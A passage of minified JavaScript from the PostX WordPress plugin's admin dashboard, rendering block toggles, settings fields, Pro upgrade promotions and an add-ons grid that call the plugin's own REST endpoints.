#2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6830",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-2/",icon:"post-grid-2.svg"},advanced_search:{label:(0,r.__)("Search - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8233",docs:"https://wpxpo.com/docs/postx/all-blocks/search-block",icon:"advanced-search.svg"},button_group:{label:(0,r.__)("Button Group","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7952",docs:"https://wpxpo.com/docs/postx/all-blocks/button-block/",icon:"button-group.svg"}},u=(0,o.t)();(0,a.useEffect)((()=>{m()}),[]);const m=()=>{wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&u.current&&(t(e.settings),i(!1))}))};return(0,a.createElement)(a.Fragment,null,l.state&&(0,a.createElement)(p.Z,{delay:2e3,toastMessages:l,setToastMessages:c}),Object.keys(d).map(((o,i)=>{const l=d[o];let p=!!l.default;return""==e[o]&&(p="yes"==e[o]),(0,a.createElement)("div",{key:o},n?(0,a.createElement)("div",{className:"ultp-dash-blocks-item ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:24,unit1:"px",size2:24,unit2:"px",br:4}}),(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:70,unit1:"px",size2:24,unit2:"px",br:4}})),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:30,unit1:"px",size2:20,unit2:"px",br:4}}),(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:20}}))):(0,a.createElement)("div",{className:"ultp-dash-blocks-item ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)("img",{className:"ultp-blocks-item-icon",src:`${ultp_dashboard_pannel.url}assets/img/blocks/${l.icon}`,alt:l.label}),(0,a.createElement)("div",{className:"ultp-blocks-item-title"},l.label)),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},l.live&&(0,a.createElement)("a",{href:l.live,className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},(0,r.__)("Demo","ultimate-post")),(0,a.createElement)("input",{type:"checkbox",className:"ultp-blocks-enable",id:o,checked:p,onChange:()=>{(n=>{const a=e?.hasOwnProperty(n)&&"yes"!=e[n]?"yes":"";t({...e,[n]:a}),wp.apiFetch({path:"/ultp/v2/addon_block_action",method:"POST",data:{key:n,value:a}}).then((e=>{e.success&&c({status:"success",messages:[e.message],state:!0})}))})(o)}}),(0,a.createElement)("label",{className:"ultp-control__label",htmlFor:o}))))})))},d=()=>{const e=[{label:(0,r.__)("50+ Custom Layouts","ultimate-post")},{label:(0,r.__)("250+ Pattern","ultimate-post")},{label:(0,r.__)("45+ Custom Post Blocks","ultimate-post")},{label:(0,r.__)("Pin-point Customization","ultimate-post")},{label:(0,r.__)("Dynamic Site Building","ultimate-post")},{label:(0,r.__)("Limitless Flexibility","ultimate-post")}],[t,n]=(0,a.useState)(!1);return(0,a.createElement)("div",{className:"ultp-dashboard-container-grid"},(0,a.createElement)("div",{className:"ultp-dashboard-content"},(0,a.createElement)("div",{className:"ultp-dash-banner ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-dash-banner-left"},(0,a.createElement)("div",{className:"ultp-dash-banner-title"},"Create Engaging Sites in Minutes…"),(0,a.createElement)("div",{className:"ultp-dash-banner-description"},"Thrilled to improve your WordPress blog? PostX supports you in creating and customizing stunning blogs! Design smooth, powerful websites - no compromises, unlimited options."),(0,a.createElement)("a",{className:"ultp-primary-alter-button",onClick:e=>{e.preventDefault(),window.location.replace("#startersites")}},(0,r.__)("Build with Starter Sites","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-dash-banner-right"},t?(0,a.createElement)("iframe",{className:"ultp-dash-banner-right-video",src:"https://www.youtube.com/embed/FYgSe7kgb6M?autoplay=1",allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; fullscreen",title:"Ultimate Post"}):(0,a.createElement)("div",{className:"ultp-dash-banner-right-img"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_banner_right.png",alt:(0,r.__)("Ultimate Post","ultimate-post")}),(0,a.createElement)("div",{className:"ultp-dash-banner-right-play-button",onClick:()=>{n(!0)}},l.ZP.rightFillAngle)))),(0,a.createElement)("div",{className:"ultp-dash-blocks ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-dash-blocks-heading"},(0,a.createElement)("div",{className:"ultp-dash-blocks-heading-title"},(0,r.__)("Blocks","ultimate-post")),(0,a.createElement)("a",{onClick:e=>{e.preventDefault(),window.location.replace("#blocks")},className:"ultp-transparent-button"},(0,r.__)("View All","ultimate-post"),l.ZP.angle_top_right_line)),(0,a.createElement)("div",{className:"ultp-dash-blocks-items"},(0,a.createElement)(c,null))),!ultp_dashboard_pannel?.active&&(0,a.createElement)("div",{className:"ultp-dash-pro-promo ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left"},(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-title"},(0,r.__)("Go Pro & Unlock More! 🚀","ultimate-post")),(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-description"},(0,r.__)("Harness the true power of PostX: build, customize, and launch dynamic WordPress sites with unrestricted creative control - no code, no hassle.","ultimate-post")),(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-keyfeature"},e.map(((e,t)=>(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-keyfeature-item",key:e.label},l.ZP.right_circle_solid,e.label)))),(0,a.createElement)("a",{href:(0,i.Z)("https://www.wpxpo.com/postx/?utm_source=db-postx-topbar&utm_medium=upgrade-pro-sidebar&utm_campaign=postx-dashboard#pricing"),target:"_blank",rel:"noreferrer",className:"ultp-primary-alter-button"},l.ZP.rocket,"Upgrade to Pro")),(0,a.createElement)("img",{className:"ultp-dash-pro-promo-right-img",src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_pro_promo.png",alt:"Ultimate Post"}))),(0,a.createElement)("div",{className:"ultp-sidebar-features"},(0,a.createElement)("div",{className:"ultp-sidebar-card-item ultp-sidebar-starter-sites"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/sidebar-starter-sites.png",alt:"Starter Sites Make it Easy"}),(0,a.createElement)("div",{className:"ultp-sidebar-card-title"},"Starter Sites Make it Easy"),(0,a.createElement)("span",{className:"ultp-sidebar-card-description"},"Create awesome-looking webpages without any code with PostX starter sites - simply import the starter template of your choice. Drag, drop, and deploy your site in minutes."),(0,a.createElement)("div",{className:"ultp-sidebar-card-buttons"},(0,a.createElement)("a",{href:"https://www.wpxpo.com/postx/starter-sites/?utm_source=db-postx-started&utm_medium=starter-sites&utm_campaign=postx-dashboard&pux_link=dbstartersite",className:"ultp-primary-button",target:"_blank",rel:"noreferrer"},l.ZP.angle_top_right_line,"Explore Starter Templates"))),(0,a.createElement)("div",{className:"ultp-sidebar-card-item ultp-sidebar-community"},(0,a.createElement)("div",{className:"ultp-sidebar-card-title"},"PostX Community"),(0,a.createElement)("span",{className:"ultp-sidebar-card-description"},"Join the Facebook community of PostX to stay up-to-date and share your thoughts and feedback."),(0,a.createElement)("div",{className:"ultp-sidebar-card-buttons"},(0,a.createElement)("a",{href:"https://www.facebook.com/groups/gutenbergpostx",className:"ultp-primary-button",target:"_blank",rel:"noreferrer"},l.ZP.facebook,"Join PostX Community")))))}},4482:(e,t,n)=>{"use strict";n.d(t,{DC:()=>p,WO:()=>m,ac:()=>u,cs:()=>d,gR:()=>f,hx:()=>c,u4:()=>l});var a=n(7294),r=n(4766),o=n(3100),i=n(4190);n(3479);const{__}=wp.i18n,l={preloader_style:{type:"select",label:__("Preloader Style","ultimate-post"),options:{style1:__("Preloader Style 1","ultimate-post"),style2:__("Preloader Style 2","ultimate-post")},default:"style1",desc:__("Select Preloader Style.","ultimate-post"),tooltip:__("PostX has two preloader variations that display while loading PostX's blocks if you enable the preloader for that blocks.","ultimate-post")},container_width:{type:"number",label:__("Container Width","ultimate-post"),default:"1140",desc:__("Change Container Width of the Page Template(PostX Template).","ultimate-post"),tooltip:__("Here you can increase or decrease the container width. It will be applicable when you create any dynamic template with the PostX Builder or select PostX's Template while creating a page.","ultimate-post")},hide_import_btn:{type:"switch",label:__("Hide Template Kits Button","ultimate-post"),default:"",desc:__("Hide Template Kits Button from toolbar of the Gutenberg Editor.","ultimate-post"),tooltip:__("Click on the check box to hide the Template Kits button from posts, pages, and the Builder of PostX.","ultimate-post")},disable_image_size:{type:"switch",label:__("Disable Image Size","ultimate-post"),default:"",desc:__("Disable Image Size of the Plugins.","ultimate-post"),tooltip:__("Click on the check box to turn off the PostX's size of the post images.","ultimate-post")},disable_view_cookies:{type:"switch",label:__("Disable All Cookies","ultimate-post"),default:"",desc:__("Disable All Frontend Cookies (Cookies Used for Post View Count).","ultimate-post"),tooltip:__("Click on the check box to restrict PostX from collecting cookies. PostX contains cookies to display the post view count.","ultimate-post")},disable_google_font:{type:"switchButton",label:__("Disable All Google Fonts","ultimate-post"),default:"",desc:__("Disable All Google Fonts From Frontend and Backend PostX Blocks.","ultimate-post"),tooltip:__("Click the check box to disable all Google Fonts from PostX's typography options.","ultimate-post")}},s=({multikey:e,value:t,multiValue:n})=>{var o;const[i,l]=(0,a.useState)([...n]),[s,p]=(0,a.useState)(!1),[c,d]=(0,a.useState)(null!==(o=t.options)&&void 0!==o?o:{}),[u,m]=(0,a.useState)(""),f=e=>{e.target.closest(".ultp-ms-container")||p(!1)};return(0,a.useEffect)((()=>(document.addEventListener("mousedown",f),()=>document.removeEventListener("mousedown",f))),[]),(0,a.useEffect)((()=>{setTimeout((()=>{const e=Object.fromEntries(Object.entries(t.options).filter((([e,t])=>t.toLowerCase().includes(u.toLowerCase())||e.toLowerCase().includes(u.toLowerCase()))));d(e)}),500)}),[u]),(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"hidden",name:e,value:i,"data-customprop":"custom_multiselect"}),(0,a.createElement)("div",{className:"ultp-ms-container"},(0,a.createElement)("div",{onClick:()=>p(!s),className:"ultp-ms-results-con cursor"},(0,a.createElement)("div",{className:"ultp-ms-results"},i.length>0?i?.map(((e,n)=>(0,a.createElement)("span",{key:n,className:"ultp-ms-selected"},t.options[e],(0,a.createElement)("span",{className:"ultp-ms-remove cursor",onClick:t=>{var n;t.stopPropagation(),n=e,l(i.filter((e=>e!=n)))}},r.ZP.close_circle_line)))):(0,a.createElement)("span",null,__("Select options"))),(0,a.createElement)("span",{onClick:()=>p(!s),className:"ultp-ms-results-collapse cursor"},r.ZP.collapse_bottom_line)),s&&c&&(0,a.createElement)("div",{className:"ultp-ms-options"},(0,a.createElement)("input",{type:"text",className:"ultp-multiselect-search",value:u,onChange:e=>m(e.target.value)}),Object.keys(c)?.map(((e,n)=>(0,a.createElement)("span",{className:"ultp-ms-option cursor",onClick:()=>(e=>{if(-1==i.indexOf(e)&&"all"!=e&&l([...i,e]),"all"===e){const e=Object.fromEntries(Object.entries(t.options).filter((([e,t])=>!t.toLowerCase().includes("all"))));l(Object.keys(e))}})(e),key:n,value:e},c[e]))))))},p=(e,t)=>(0,a.createElement)(a.Fragment,null,Object.keys(e).map(((n,r)=>{const o=e[n];return(0,a.createElement)("span",{key:r},"hidden"==o.type&&(0,a.createElement)("input",{key:n,type:"hidden",name:n,defaultValue:o.value}),"hidden"!=o.type&&(0,a.createElement)(a.Fragment,null,"heading"==o.type&&(0,a.createElement)("div",{className:"ultp_h2 ultp-settings-heading"},o.label)&&(0,a.createElement)(a.Fragment,null,o.desc&&(0,a.createElement)("div",{className:"ultp-settings-subheading"},o.desc)),"heading"!=o.type&&(0,a.createElement)("div",{className:"ultp-settings-wrap"},o.label&&(0,a.createElement)("strong",null,o.label,o.tooltip&&(0,a.createElement)(i.Z,{content:o.tooltip},(0,a.createElement)("span",{className:" cursor dashicons dashicons-editor-help"}))),(0,a.createElement)("div",{className:"ultp-settings-field-wrap"},((e,t,n)=>{const r=n.hasOwnProperty(e)?n[e]:t.default?t.default:"multiselect"==t.type?[]:"";switch(t.type){case"select":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("select",{defaultValue:r,name:e,id:e},Object.keys(t.options).map(((e,n)=>(0,a.createElement)("option",{key:n,value:e},t.options[e])))),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"radio":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("div",{className:"ultp-field-radio"},(0,a.createElement)("div",{className:"ultp-field-radio-items"},Object.keys(t.options).map(((n,o)=>(0,a.createElement)("div",{key:o,className:"ultp-field-radio-item"},(0,a.createElement)("input",{type:"radio",id:n,name:e,value:n,defaultChecked:n===r}),(0,a.createElement)("label",{htmlFor:n},t.options[n])))))),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"color":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"text",defaultValue:r,className:"ultp-color-picker"}),(0,a.createElement)("span",{className:"ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,className:"ultp-color-code",defaultValue:r})),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"number":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"number",name:e,defaultValue:r}),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"switch":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{value:"yes",type:"checkbox",name:e,defaultChecked:"yes"==r||"on"==r}),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"switchButton":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-field-inline"},(0,a.createElement)("input",{type:"checkbox",value:"yes",name:e,defaultChecked:"yes"==r||"on"==r}),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc),(0,a.createElement)("div",null,(0,a.createElement)("span",{id:"postx-regenerate-css",className:`ultp-upgrade-pro-btn cursor ${"yes"==r?"active":""} `},(0,a.createElement)("span",{className:"dashicons dashicons-admin-generic"}),(0,a.createElement)("span",{className:"ultp-text"},__("Re-Generate Font Files","ultimate-post")))));case"multiselect":const n=Array.isArray(r)?r:[r];return(0,a.createElement)(s,{multikey:e,value:t,multiValue:n});case"text":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,defaultValue:r}),(0,a.createElement)("span",{className:"ultp-description"},t.desc,t.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:t.link,rel:"noreferrer"},t.linkText)));case"textarea":return(0,a.createElement)("div",{className:"ultp-settings-field ultp-settings-input-field"},(0,a.createElement)("textarea",{name:e,defaultValue:r}),(0,a.createElement)("span",{className:"ultp-description"},t.desc,t.link&&(0,a.createElement)("a",{className:"settingsLink",target:"_blank",href:t.link,rel:"noreferrer"},t.linkText)));case"shortcode":return(0,a.createElement)("code",{className:"ultp-shortcode-copy"},"[",t.value,"]")}})(n,o,t)))))}))),c=(e,t,n="")=>{const r=n||__("Upgrade to Pro","ultimate-post");return(0,a.createElement)("a",{href:(0,o.Z)(e,t,""),className:"ultp-upgrade-pro-btn",target:"_blank",rel:"noreferrer"},r,"  ➤")},d=({tags:e,func:t,data:n})=>(0,a.createElement)("div",{className:"ultp-addon-lock-container-overlay"},(0,a.createElement)("div",{className:"ultp-addon-lock-container"},(0,a.createElement)("div",{className:"ultp-popup-unlock"},(0,a.createElement)("img",{src:`${ultp_option_panel.url}/assets/img/dashboard/${n.icon}`,alt:"lock icon"}),(0,a.createElement)("div",{className:"title ultp_h5"},n?.title),(0,a.createElement)("div",{className:"ultp-description"},n?.description),c("",e),(0,a.createElement)("button",{onClick:()=>{t(!1)},className:"ultp-popup-close"},r.ZP.close_line)))),u=(e,t,n,r="")=>(0,a.createElement)("a",{href:(0,o.Z)(e,t,""),className:"ultp-primary-button "+r,target:"_blank",rel:"noreferrer"},n),m=(e,t,n,r="")=>(0,a.createElement)("a",{href:(0,o.Z)(e,t,""),className:"ultp-secondary-button "+r,target:"_blank",rel:"noreferrer"},n),f=({proBtnTags:e,FRBtnTag:t})=>{const[n,i]=(0,a.useState)([{id:"go-pro-unlock-more",title:"Go Pro & Unlock More! 🚀",description:"Unlock the full potential of PostX to create and manage professional News Magazines and Blogging sites with complete creative freedom.",features:[__("Access to 40+ Blocks","ultimate-post"),__("Access to 250+ Patterns","ultimate-post"),__("All Starter Packs Access","ultimate-post"),__("Advanced Query Builder","ultimate-post"),__("Ajax Filter and Pagination","ultimate-post"),__("Custom Fonts with Typography","ultimate-post")],visible:!ultp_option_panel.active,buttons:[{type:"primary-alter",icon:r.ZP.rocket,url:"https://www.wpxpo.com/postx/?utm_source=db-postx-setting&utm_medium=upgrade-pro-sidebar&utm_campaign=postx-dashboard#pricing",label:"Upgrade Pro"},{type:"transparent-alter",label:"Free VS Pro"}]},{id:"feature-request",title:"Feature Request",description:"Can't find your desired feature? Let us know your requirements. We will definitely take them into our consideration.",buttons:[{type:"primary",url:"https://www.wpxpo.com/postx/roadmap/?utm_source=postx-menu&utm_medium=DB-roadmap&utm_campaign=postx-dashboard",label:"Request a Feature"}],visible:!0},{id:"web-community",title:"PostX Community",description:"Join the Facebook community of PostX to stay up-to-date and share your thoughts and feedback.",buttons:[{type:"primary",icon:r.ZP.facebook,url:"https://www.facebook.com/groups/gutenbergpostx",label:"Join PostX Community"}],visible:!0},{id:"news-tips",title:"News, Tips & Update",linkIcon:r.ZP.rightArrowLg,links:[{text:"Getting Started with PostX",url:"https://wpxpo.com/docs/postx/getting-started/?utm_source=postx-menu&utm_medium=DB-news-postx_GT&utm_campaign=postx-dashboard"},{text:"How to use the Dynamic Site Builder",url:"https://wpxpo.com/docs/postx/dynamic-site-builder/?utm_source=postx-menu&utm_medium=DB-news-DSB_guide&utm_campaign=postx-dashboard"},{text:"How to use the PostX Features",url:"https://wpxpo.com/docs/postx/postx-features/?utm_source=postx-menu&utm_medium=DB-news-feature_guide&utm_campaign=postx-dashboard"},{text:"PostX Blog",url:"https://www.wpxpo.com/category/postx/?utm_source=postx-menu&utm_medium=DB-news-blog&utm_campaign=postx-dashboard"}],visible:!0},{id:"rating",title:"Show your love",description:"Enjoying PostX? Give us a 5 Star review to support our ongoing work.",buttons:[{type:"primary",url:"https://wordpress.org/support/plugin/ultimate-post/reviews/",label:"Rate it Now"}],visible:!0}]);return(0,a.createElement)("div",{className:"ultp-sidebar-features"},!ultp_option_panel.active&&new Date>=new Date("2024-03-07")&&new Date<=new Date("2024-03-13")&&(0,a.createElement)("div",{className:"ultp-dashboard-pro-features ultp-dash-item-con"},(0,a.createElement)("a",{href:"https://www.wpxpo.com/postx/?utm_source=postx-ad&utm_medium=sidebar-banner&utm_campaign=postx-dashboard#pricing",target:"_blank",style:{textDecoration:"none !important",display:"block"},rel:"noreferrer"},(0,a.createElement)("img",{src:ultp_option_panel.url+"assets/img/dashboard/db_sidebar.jpg",style:{width:"100%",height:"100%",borderRadius:"8px"},alt:"40k+ Banner"}))),n.map(((e,t)=>!1!==e.visible&&(0,a.createElement)("div",{key:t,className:`ultp-sidebar-card-item ultp-sidebar-${e.id}`},"banner"===e.type?(0,a.createElement)("a",{href:e.bannerUrl,target:"_blank",rel:"noreferrer",style:{textDecoration:"none !important",display:"block"}},(0,a.createElement)("img",{src:e.imageUrl,style:{width:"100%",height:"100%",borderRadius:"8px"},alt:e.alt})):(0,a.createElement)(a.Fragment,null,e.title&&(0,a.createElement)("div",{className:"ultp-sidebar-card-title"},__(e.title,"ultimate-post")),e.description&&(0,a.createElement)("span",{className:"ultp-sidebar-card-description"},__(e.description,"ultimate-post")),e.features?(0,a.createElement)("div",{className:"ultp-pro-feature-lists"},e.features.map(((e,t)=>(0,a.createElement)("span",{key:t},r.ZP.right_circle_line," ",__(e,"ultimate-post"))))):e.links?(0,a.createElement)("div",{className:"ultp-sidebar-card-links"},e.links.map(((t,n)=>(0,a.createElement)("a",{className:"ultp-sidebar-card-link",key:n,target:"_blank",href:t.url,rel:"noreferrer"},e.linkIcon&&(0,a.createElement)("span",null,e.linkIcon),__(t.text,"ultimate-post"))))):null,e.buttons&&e.buttons.length>0&&(0,a.createElement)("div",{className:"ultp-sidebar-card-buttons"},e.buttons.map((e=>(({type:e="primary",icon:t,url:n,tags:r,label:i,classname:l=""})=>(0,a.createElement)("a",{href:(0,o.Z)(n,r,""),className:"ultp-"+e+"-button "+l,target:"_blank",rel:"noreferrer",key:i+Math.random()},t&&t,i))({type:e.type,icon:e.icon,url:e.url,tags:e.tags||"",label:e.label,classname:e.classname||""})))))))))}},860:(e,t,n)=>{"use strict";n.d(t,{Z:()=>m});var a=n(7294),r=n(1383),o=n(7763),i=n(4766),l=n(4482),s=n(1389),p=n(8949),c=n(356),d=(n(6129),n(1370)),u=n(6731);const{__}=wp.i18n,m=({integrations:e,generalDiscount:t={}})=>{const[n,m]=(0,a.useState)(""),[f,h]=(0,a.useState)(!1),[g,v]=(0,a.useState)({}),[_,w]=(0,a.useState)(""),[b,x]=(0,a.useState)({state:!1,status:""}),[y,k]=(0,a.useState)(""),[E,C]=(0,a.useState)(!1);let S=d.q;const M=ultp_dashboard_pannel.addons_settings,L=Object.entries(S);L.sort(((e,t)=>e[1].position-t[1].position)),S=Object.fromEntries(L),(0,a.useEffect)((()=>(P(),document.addEventListener("mousedown",A),()=>document.removeEventListener("mousedown",A))),[]);const N=[{label:__("45+ Blocks","ultimate-post"),descp:__("PostX comes with over 45 Gutenberg blocks","ultimate-post")},{label:__("250+ Patterns","ultimate-post"),descp:__("Get full access to all ready post sections","ultimate-post")},{label:__("50+ Starter Sites","ultimate-post"),descp:__("Pre-built websites are ready to import in one click","ultimate-post")},{label:__("Global Styles","ultimate-post"),descp:__("Control the full website’s colors and typography globally","ultimate-post")},{label:__("Dark/Light Mode","ultimate-post"),descp:__("Let your readers switch between light and dark modes","ultimate-post")},{label:__("Advanced Query Builder","ultimate-post"),descp:__("Display/reorder posts, pages, and custom post types","ultimate-post")},{label:__("Dynamic Site Builder","ultimate-post"),descp:__("Dynamically create templates for essential pages","ultimate-post")},{label:__("Ajax Powered Filter","ultimate-post"),descp:__("Let your visitors filter posts by categories and tags","ultimate-post")},{label:__("Advanced Post Slider","ultimate-post"),descp:__("Display posts in engaging sliders and carousels","ultimate-post")},{label:__("SEO Meta Support","ultimate-post"),descp:__("Replace the post excerpts with meta descriptions","ultimate-post")},{label:__("Custom Fonts","ultimate-post"),descp:__("Upload custom fonts per your requirements","ultimate-post")},{label:__("Ajax Powered Pagination","ultimate-post"),descp:__("PostX comes with three types of Ajax pagination","ultimate-post")}],Z=(0,r.t)(),P=()=>{wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&Z.current&&v(e.settings)}))},z=e=>{C(!0),e.preventDefault();const t=new FormData(e.target),n={};for(const a of e.target.elements)a.name&&("checkbox"!==a.type||a.checked?"radio"===a.type?a.checked&&(n[a.name]=a.value):"select-multiple"===a.type?n[a.name]=t.getAll(a.name):"custom_multiselect"==a.dataset.customprop?n[a.name]=a.value?a.value.split(","):[]:n[a.name]=a.value:n[a.name]="");wp.apiFetch({path:"/ultp/v2/save_plugin_settings",method:"POST",data:{settings:n,action:"action",type:"type"}}).then((e=>{C(!1),e.success&&x({status:"success",messages:[e.message],state:!0})}))},A=e=>{e.target.closest(".ultp-addon-settings-popup")||m("")},B=[__("Access to Pro Starter Site Templates","ultimate-post"),__("Access to All Pro Features","ultimate-post"),__("Fully Unlocked Site Builder","ultimate-post"),__("And more…","ultimate-post")],H=[{label:__("Add-Ons","ultimate-post"),value:"addons",integration:!1},{label:__("Integration Add-Ons","ultimate-post"),value:"integration-addons",integration:!0}];return(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-dashboard-addons-container "+(Object.keys(g).length>0?"":" skeletonOverflow")},!e&&(0,a.createElement)("div",{className:"ultp-gettingstart-message"},(0,a.createElement)("div",{className:"ultp-start-left"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_banner.jpg",alt:"Banner"}),(0,a.createElement)("div",{className:"ultp-start-content"},(0,a.createElement)("span",{className:"ultp-start-text"},__("Enjoy Pro-level Ready Templates!","ultimate-post")),(0,a.createElement)("div",{className:"ultp-start-btns"},(0,l.ac)("https://www.wpxpo.com/postx/starter-sites/?utm_source=db-postx-started&utm_medium=starter-sites&utm_campaign=postx-dashboard&pux_link=dbstartersite","",__("Explore Starter Sites","ultimate-post"),""),(0,l.WO)("https://www.wpxpo.com/postx/?utm_source=db-postx-started&utm_medium=details&utm_campaign=postx-dashboard","",__("Plugin Details","ultimate-post"),"")))),(0,a.createElement)("div",{className:"ultp-start-right"},(0,a.createElement)("div",{className:"ultp-dashborad-banner",style:{cursor:"pointer"},onClick:()=>k((0,a.createElement)("iframe",{width:"1100",height:"500",src:"https://www.youtube.com/embed/FYgSe7kgb6M?autoplay=1",title:__("How to add Product Filter to WooCommerce Shop Page","ultimate-post"),allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share",allowFullScreen:!0}))},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_right_banner.jpg",className:"ultp-banner-img"}),(0,a.createElement)("div",{className:"ultp-play-icon-container"},(0,a.createElement)("img",{className:"ultp-play-icon",src:ultp_dashboard_pannel.url+"/assets/img/dashboard/play.png",alt:__("Play","ultimate-post")}),(0,a.createElement)("span",{className:"ultp-animate"}))),(0,a.createElement)("div",{className:"ultp-dashboard-content"},ultp_dashboard_pannel.active?(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-title _pro"},__("What Do You Need?","ultimate-post")),(0,a.createElement)("div",{className:"ultp-description _pro"},__("Do you have something in mind you want to share? Both we and our users would like to hear about it. Share your ideas on our Facebook group and let us know what you need.","ultimate-post")),(0,l.ac)("https://www.facebook.com/groups/gutenbergpostx","","Share Ideas","")):(0,a.createElement)(a.Fragment,null,(0,a.createElement)("div",{className:"ultp-title"},__("Do More with","ultimate-post")," ",(0,a.createElement)("span",{style:{color:"var(--postx-primary-color)"}},__("PRO:","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-description"},__("Unlock powerful customizations with PostX Pro:","ultimate-post")),(0,a.createElement)("div",{className:"ultp-lists"},B.map(((e,t)=>(0,a.createElement)("span",{className:"ultp-list",key:t},o.Z.rightMark," ",e)))),(0,a.createElement)("a",{href:"https://www.wpxpo.com/postx/?utm_source=db-postx-started&utm_medium=upgrade-pro-hero&utm_campaign=postx-dashboard#pricing",className:"ultp-upgrade-btn",target:"_blank",rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),o.Z.rocketPro))))),f&&(0,l.cs)({tags:"addons_popup",func:e=>{h(e)},data:{icon:"addon_lock.svg",title:__("Unlock All Addons of PostX","ultimate-post"),description:__("Sorry, this addon is not available in the free version of PostX. Please upgrade to a pro plan to unlock all pro addons and features of PostX.","ultimate-post")}}),(0,a.createElement)("div",{className:"ultp-addons-container-grid"},(0,a.createElement)("div",{className:"ultp-addons-items"},H.map((t=>(0,a.createElement)("div",{key:t.value,className:"ultp-addon-group"},(0,a.createElement)("div",{className:"ultp_h2 ultp-addon-parent-heading"},t.label),Object.keys(g).length>0?((e=!1)=>(0,a.createElement)("div",{className:"ultp-addons-grid "+(e?"":"ultp-gs")},Object.keys(S).map(((t,r)=>{const o=S[t];if(e&&!o.integration||!e&&o.integration)return;let s=!0;return s=!("true"!=g[t]&&1!=g[t]||o.is_pro&&!ultp_dashboard_pannel.active),(0,a.createElement)("div",{className:"ultp-addon-item",key:t},(0,a.createElement)("div",{className:"ultp-addon-item-contents",style:{paddingBottom:o.notice?"10px":"auto"}},(0,a.createElement)("div",{className:"ultp-addon-item-name"},(0,a.createElement)("img",{src:`${ultp_dashboard_pannel.url}assets/img/addons/${o.img}`,alt:o.name}),(0,a.createElement)("div",{className:"ultp_h6 ultp-addon-item-title"},o.name,o?.new&&(0,a.createElement)("span",{className:"ultp-new-tag"},"New")),(0,a.createElement)("div",{className:"ultp-dash-control-options ultp-ml-auto"},(0,a.createElement)("input",{type:"checkbox",datatype:t,className:"ultp-addons-enable "+(o.is_pro&&!ultp_dashboard_pannel.active?"disabled":""),id:t,checked:s,onChange:()=>{(e=>{const t="true"==g[e]?"false":"true";!ultp_dashboard_pannel.active&&S[e].is_pro?(v({...g,[e]:"false"}),h(!0)):(v({...g,[e]:t}),wp.apiFetch({path:"/ultp/v2/addon_block_action",method:"POST",data:{key:e,value:t}}).then((n=>{n.success&&(["ultp_templates","ultp_custom_font","ultp_builder"].includes(e)&&(document.getElementById("postx-submenu-"+e.replace("templates","saved_templates").replace("ultp_","").replace("_","-")).style.display="true"==t?"block":"none",document.getElementById(e.replace("templates","saved_templates").replace("ultp_","ultp-dasnav-").replace("_","-")).style.display="true"==t?"":"none"),setTimeout((function(){x({status:"success",messages:[n.message],state:!0})}),400))})))})(t)}}),(0,a.createElement)("label",{htmlFor:t,className:"ultp-control__label"},o.is_pro&&!ultp_dashboard_pannel.active&&(0,a.createElement)("span",{className:"dashicons 